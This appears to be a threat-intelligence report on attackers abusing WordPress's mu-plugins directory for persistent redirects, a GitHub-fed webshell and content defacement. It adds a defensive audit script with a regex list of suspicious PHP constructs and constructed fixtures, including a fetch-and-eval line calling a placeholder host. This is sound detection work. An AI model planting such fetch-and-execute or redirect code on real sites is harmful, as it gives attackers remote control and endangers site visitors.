Full Report
Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]
Analysis Summary
# Tool/Technique: WordPress MU-Plugin Abuse (Malicious Payloads)
## Overview
This describes a technique where attackers plant malicious PHP files in WordPress's Must-Use Plugins directory (`wp-content/mu-plugins/`) to maintain persistence and run several attacks from a single foothold. Every `.php` file placed directly in that directory is included by WordPress core on every request (front end, admin, AJAX and REST alike) with no activation step, and such files are not listed alongside ordinary plugins: they appear only under a separate Must-Use tab on the Plugins page and cannot be deactivated from the dashboard. That makes the directory a low-visibility, always-on persistence mechanism for an ongoing site compromise.
## Technical Details
- Type: Technique / Malware Injection (using legitimate platform features)
- Platform: WordPress (PHP environment)
- Capabilities: Credential theft, HTML/content manipulation, forced redirects, remote code execution, malware distribution.
- First Seen: Not stated in the source. The entry vector is not confirmed either; the report hypothesizes exploitation of vulnerable themes or plugins, and its MFA recommendation implies compromised administrator credentials as an alternative route.
## MITRE ATT&CK Mapping
Because the report describes an execution-and-persistence method rather than a named malware family, the mappings cover Initial Access, Execution, Persistence, Command and Control, and Impact.
- **TA0001 - Initial Access** (hypothesized entry vector)
- T1190 - Exploit Public-Facing Application (vulnerable themes/plugins); T1078 - Valid Accounts (compromised administrator credentials, implied by the MFA mitigation)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter (PHP executed by the web server; ATT&CK has no PHP sub-technique, so the parent technique applies)
- **TA0003 - Persistence**
- T1505.003 - Server Software Component: Web Shell (the `index.php` payload; all three files persist by being auto-loaded from `mu-plugins` on every request)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (the webshell fetches second-stage PHP from GitHub)
- T1102 - Web Service (GitHub used as the hosting point for that code)
- **TA0040 - Impact**
- T1491.002 - Defacement: External Defacement (image replacement and link hijacking by `custom-js-loader.php`)
- Visitor-side, the fake browser update delivered after the redirect maps to T1204.002 - User Execution: Malicious File
## Functionality
### Core Capabilities
The attackers utilize three primary malicious payloads planted in the `mu-plugins` directory:
1. **`redirect.php`**: Responsible for visitor redirection.
* Redirects site visitors (excluding bots and logged-in administrators) to a malicious external domain.
* The remote site displays a fake browser update prompt designed to trick users into downloading malware.
2. **`index.php` (Webshell)**: Functions as a persistent backdoor.
* Fetches and executes arbitrary PHP code hosted on an external GitHub repository, enabling remote command execution.
3. **`custom-js-loader.php`**: Used for client-side user impact.
* Loads malicious JavaScript that replaces all legitimate images on the site with explicit content.
* Hijacks outbound links, replacing them with shady popups.
### Advanced Features
* **Stealth**: MU-plugins load automatically on every request without activation, are absent from the ordinary plugin list (only a separate Must-Use tab shows them), and cannot be deactivated from the dashboard, so they survive routine plugin reviews and persist until the file itself is removed from disk.
* **Remote Code Execution (via Webshell)**: Enables attackers to steal data and launch follow-on attacks against site members or visitors.
* **Reputation/SEO Damage**: The redirection and explicit content injection severely damage site reputation and search engine ranking.
## Indicators of Compromise
- File Hashes: N/A (Varies by specific payload deployment)
- File Names: `redirect.php`, `index.php`, `custom-js-loader.php` (within the `wp-content/mu-plugins/` directory)
- Registry Keys: N/A (Web environment)
- Network Indicators:
* `updatesnow[.]net` (Used for delivering fake update malware prompts)
* GitHub repository (Used by the webshell payload for fetching secondary commands/code)
- Behavioral Indicators:
* Unrecognized or unauthorized PHP files appearing in the `wp-content/mu-plugins/` directory.
* Outbound traffic to suspicious domains from the WordPress server initiated by PHP scripts attempting to load external code.
* Abnormal page loads resulting in immediate redirects for standard users.
* Client-side scripts replacing legitimate site images or hijacking link clicks.
## Associated Threat Actors
The context implies financially motivated operations, but specific named threat groups are **not identified** in the provided text.
## Detection Methods
- Signature-based detection: Identifying the presence of the specific malicious PHP code snippets within MU-plugin files.
- Behavioral detection: Alerting on outbound HTTP(S) connections from the PHP worker processes (php-fpm or mod_php) to GitHub or known-malicious domains, since a production site has little reason to fetch executable code at request time; and detecting pages whose rendered output differs from stored content (injected scripts, rewritten links, replaced images) for anonymous visitors but not for logged-in administrators.
- YARA rules: Can be developed to detect specific string patterns or file structures associated with these three known payloads.
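The following script is an added example, not code from the original report or from WordPress. It puts the detection and monitoring ideas above (and the `mu-plugins` monitoring in the mitigations) into runnable form: it lists exactly the files WordPress would auto-load, greps them for the constructs the three described payloads rely on, and diffs the directory against a saved sha256 baseline. It assumes GNU coreutils (`sha256sum`, `find`, `mktemp`) and `grep -E`; the fixture directory, file contents and the `example.invalid` host are constructed placeholders, not real samples.

```shell
# Added example, not code from the original report or from WordPress.
# Audits a WordPress mu-plugins directory three ways: list what WordPress
# would auto-load, grep it for the constructs the described payloads rely
# on, and diff it against a saved sha256 baseline. Assumes GNU coreutils
# (sha256sum, find, mktemp) and grep -E. Paths and hosts are placeholders.

# WordPress core (wp_get_mu_plugins) includes only *.php files that sit
# directly in the mu-plugins directory: no subdirectories, no other
# extensions. Mirror that rule so the audit covers exactly what executes.
list_loaded_mu_plugins() {            # list_loaded_mu_plugins DIR
  find "$1" -maxdepth 1 -type f -name '*.php' | LC_ALL=C sort
}

# Constructs that deserve a human look inside an mu-plugin: runtime code
# execution, common obfuscation helpers, fetching remote content, and
# forced redirects. A hit is a lead, not a verdict; some real plugins use
# several of these legitimately.
SUSPICIOUS_RE="eval[[:space:]]*\\(|base64_decode[[:space:]]*\\(|gzinflate[[:space:]]*\\(|str_rot13[[:space:]]*\\(|curl_exec[[:space:]]*\\(|wp_remote_get[[:space:]]*\\(|file_get_contents[[:space:]]*\\([[:space:]]*[\"']https?://|header[[:space:]]*\\([[:space:]]*[\"']Location:|wp_redirect[[:space:]]*\\("

# Print one "file:line:match" per suspicious construct in the loaded files.
scan_mu_plugins() {                   # scan_mu_plugins DIR
  list_loaded_mu_plugins "$1" | while IFS= read -r f; do
    grep -Eno "$SUSPICIOUS_RE" "$f" | sed "s|^|$f:|"
  done
}

# Record the sha256 of every auto-loaded file as the known-good baseline.
write_baseline() {                    # write_baseline DIR BASELINE_FILE
  list_loaded_mu_plugins "$1" | while IFS= read -r f; do
    sha256sum "$f"
  done > "$2"
}

# Report drift against the baseline as MODIFIED/REMOVED/ADDED lines.
# Returns 0 when nothing changed, 1 otherwise.
check_baseline() {                    # check_baseline DIR BASELINE_FILE
  local dir="$1" base="$2" rc=0 old f new added
  while read -r old f; do             # sha256sum lines: "<64 hex>  <path>"
    if [ ! -f "$f" ]; then
      echo "REMOVED: $f"; rc=1
    else
      new=$(sha256sum "$f" | cut -d' ' -f1)
      [ "$new" = "$old" ] || { echo "MODIFIED: $f"; rc=1; }
    fi
  done < "$base"
  # Anything loaded now that the baseline never recorded (the path starts
  # at column 67 of a sha256sum line: 64 hex digits plus two spaces).
  added=$(list_loaded_mu_plugins "$dir" | while IFS= read -r f; do
    awk -v p="$f" 'substr($0, 67) == p { found = 1 } END { exit !found }' "$base" \
      || echo "ADDED: $f"
  done)
  [ -z "$added" ] || { printf '%s\n' "$added"; rc=1; }
  return $rc
}

# Constructed fixtures for a demo run (not real malware samples): a benign
# helper, two files shaped like the report's redirect.php and index.php but
# pointing at a placeholder host, and two files WordPress would not load.
make_demo_dir() {
  local d
  d=$(mktemp -d)
  mkdir -p "$d/vendor"
  printf '%s\n' '<?php' "add_action('init', function () { /* benign */ });" > "$d/site-helper.php"
  printf '%s\n' '<?php' "if (!is_user_logged_in()) { header('Location: https://example.invalid/update'); exit; }" > "$d/redirect.php"
  printf '%s\n' '<?php' "eval(file_get_contents('https://example.invalid/stage2.txt'));" > "$d/index.php"
  printf '%s\n' '<?php' "eval('1');" > "$d/vendor/loader.php"   # subdirectory: ignored by WordPress
  printf '%s\n' 'not php' > "$d/README.txt"                      # wrong extension: ignored
  printf '%s' "$d"
}

# Demo: list, scan, then baseline the directory and tamper with it.
demo() {
  local d base
  d=$(make_demo_dir); base=$(mktemp)
  echo "== auto-loaded files";      list_loaded_mu_plugins "$d"
  echo "== suspicious constructs";  scan_mu_plugins "$d"
  write_baseline "$d" "$base"
  echo '// tampered' >> "$d/site-helper.php"
  printf '%s\n' '<?php' "wp_redirect('https://example.invalid/');" > "$d/custom-js-loader.php"
  echo "== baseline drift";         check_baseline "$d" "$base" || echo "exit status $?"
  rm -rf "$d" "$base"
}
demo
```

Two caveats when using this against a real site. First, the loading rule is deliberately narrow: a legitimate top-level loader that `include`s files from a subdirectory (a common pattern on composer-managed sites) extends the executed set beyond what `list_loaded_mu_plugins` reports, so follow such includes by hand. Second, take the baseline from a known-clean deployment artifact rather than from a live server you have not yet verified, and remember that `WPMU_PLUGIN_DIR` in `wp-config.php` can relocate the directory, in which case pass that path instead of the default.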
## Mitigation Strategies
- Apply security updates immediately to all WordPress core components, themes, and plugins to prevent initial exploitation.
- Disable or uninstall any themes or plugins that are no longer needed.
- Protect privileged accounts (Administrators) with strong, unique passwords and mandatory Multi-Factor Authentication (MFA).
- Monitor `wp-content/mu-plugins/` (or the location set by `WPMU_PLUGIN_DIR` in `wp-config.php`) for unauthorized file creation or modification, review the Must-Use tab of the Plugins page (or `wp plugin list --status=must-use`) during audits, and remember that a malicious MU-plugin cannot be deactivated from the dashboard: it must be deleted from disk, and the original entry point closed so it is not re-planted.
## Related Tools/Techniques
* Standard WordPress Webshells
* Exploits targeting vulnerable WordPress Plugins/Themes (Hypothesized Initial Access vector)